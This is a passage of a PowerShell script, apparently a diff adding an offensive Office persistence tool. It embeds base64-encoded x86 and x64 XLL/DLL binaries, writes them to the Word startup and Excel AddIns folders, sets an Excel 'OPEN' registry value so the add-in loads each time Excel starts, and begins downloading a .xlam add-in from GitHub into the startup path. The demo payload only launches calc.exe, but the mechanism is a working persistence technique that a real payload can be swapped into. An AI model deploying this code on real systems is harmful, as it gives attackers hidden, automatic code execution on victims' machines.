[System.Convert]::FromBase64String($fileContent) + [System.IO.File]::WriteAllBytes("$env:APPDATA\Microsoft\Word\Startup\calc.wll",$fileContentBytes) + Write-Host "[+] Done." + $wdApp.Quit() + } + +Function ExcelXLL +{ + # Use XLL "Add-Ins" for Excel + # Release file: %appdata%\Microsoft\AddIns\calc.xll + # Create registry key:HKCU\Software\Microsoft\Office\15.0\Excel\Options OPEN REG_SZ "/R calc.xll" + # Pop up the calculator when you start excel.exe + $calcxllx86 = "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ZGxsAHhsQXV0b09wZW4AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAY2FsYy5leGUAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAQAAA0AAAAAzAJMCowMjA4MEMwUDBYMGYwazBwMHUwgDCNMJcwrDC4ML4w4DDyME4xajEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA" + $calcxllx64 = "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AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAADKi3y2ZKwAAzV0g0mbU////////AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAQBAAAF8QAACIIgAAYBAAAL4QAABQIwAAwBAAAAsTAACMIgAADBMAAEkTAADsIgAATBMAAIIUAACoIgAAhBQAAM0UAABQIwAA0BQAAKEVAAD8IgAAABYAAE0WAAAEIwAAgBYAAM4WAABQIwAA0BYAAIAXAAAwIwAAgBcAAJcXAAAoIwAAmBcAAFAYAABYIwAAUBgAAIgYAABkIwAAiBgAAMAYAABkIwAAIBkAAEUZAADkIgAARRkAAF8ZAADkIgAAYBkAAIAZAADkIgAAgBkAAJsZAADkIgAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAEAGAAAABgAAIAAAAAAAAAAAAAAAAAAAAEAAgAAADAAAIAAAAAAAAAAAAAAAAAAAAEACQQAAEgAAABgUAAAfQEAAAAAAAAAAAAAAAAAAAAAAAA8P3htbCB2ZXJzaW9uPScxLjAnIGVuY29kaW5nPSdVVEYtOCcgc3RhbmRhbG9uZT0neWVzJz8+DQo8YXNzZW1ibHkgeG1sbnM9J3VybjpzY2hlbWFzLW1pY3Jvc29mdC1jb206YXNtLnYxJyBtYW5pZmVzdFZlcnNpb249JzEuMCc+DQogIDx0cnVzdEluZm8geG1sbnM9InVybjpzY2hlbWFzLW1pY3Jvc29mdC1jb206YXNtLnYzIj4NCiAgICA8c2VjdXJpdHk+DQogICAgICA8cmVxdWVzdGVkUHJpdmlsZWdlcz4NCiAgICAgICAgPHJlcXVlc3RlZEV4ZWN1dGlvbkxldmVsIGxldmVsPSdhc0ludm9rZXInIHVpQWNjZXNzPSdmYWxzZScgLz4NCiAgICAgIDwvcmVxdWVzdGVkUHJpdmlsZWdlcz4NCiAgICA8L3NlY3VyaXR5Pg0KICA8L3RydXN0SW5mbz4NCjwvYXNzZW1ibHk+DQoAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAgAAAUAAAA+KAAoVChWKHIoQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA" + Try + { + $excelApp = New-Object -COMObject "Excel.Application" + } + Catch + { + Write-Host "[!] I can't find Microsoft Office!" + Write-Host "[+] Please reset a correct path." + return + } + $fileContent = $calcxllx86 + if ([IntPtr]::Size -eq 8) + { + Write-Host "[+] OS: x64" + + if(-not $excelApp.path.contains("Program Files (x86)")) + { + Write-Host "[+] Microsoft Office bit: 64-bit; copying calcxllx64" + $fileContent = $calcxllx64 + } + else + { + Write-Host "[+] Microsoft Office bit: 32-bit; copying calcxllx86" + } + } + else + { + Write-Host "[+] OS: x86; copying calcxllx86" + } + $fileContentBytes = [System.Convert]::FromBase64String($fileContent) + [System.IO.File]::WriteAllBytes($env:APPDATA+"\Microsoft\AddIns\calc.xll",$fileContentBytes) + $ver = $excelApp.version + $ExcelRegPath="HKCU:\Software\Microsoft\Office\$Ver\Excel\Options" + Remove-Item $ExcelRegPath -ErrorAction Ignore + New-Item -type Directory $ExcelRegPath | Out-Null + New-ItemProperty $ExcelRegPath OPEN -value "/R calc.xll" -propertyType string | Out-Null + $excelApp.Quit() +} + +Function ExcelVBAadd-ins +{ + # Use VBA add-ins for Excel + # Release file:%appdata%\Microsoft\Excel\XLSTART\calc.xlam + # Pop up the calculator when you start excel.exe + Try + { + $excelApp = New-Object -COMObject "Excel.Application" + } + Catch + { + Write-Host "[!] I can't find Microsoft Office!" + Write-Host "[+] Please reset a correct path." + return + } + Invoke-WebRequest "https://github.com/3gstudent/Office-Persistence/raw/0374e2e712e3c12762c4dce29ed5ee97b2b73630/calc.xlam" -OutFile 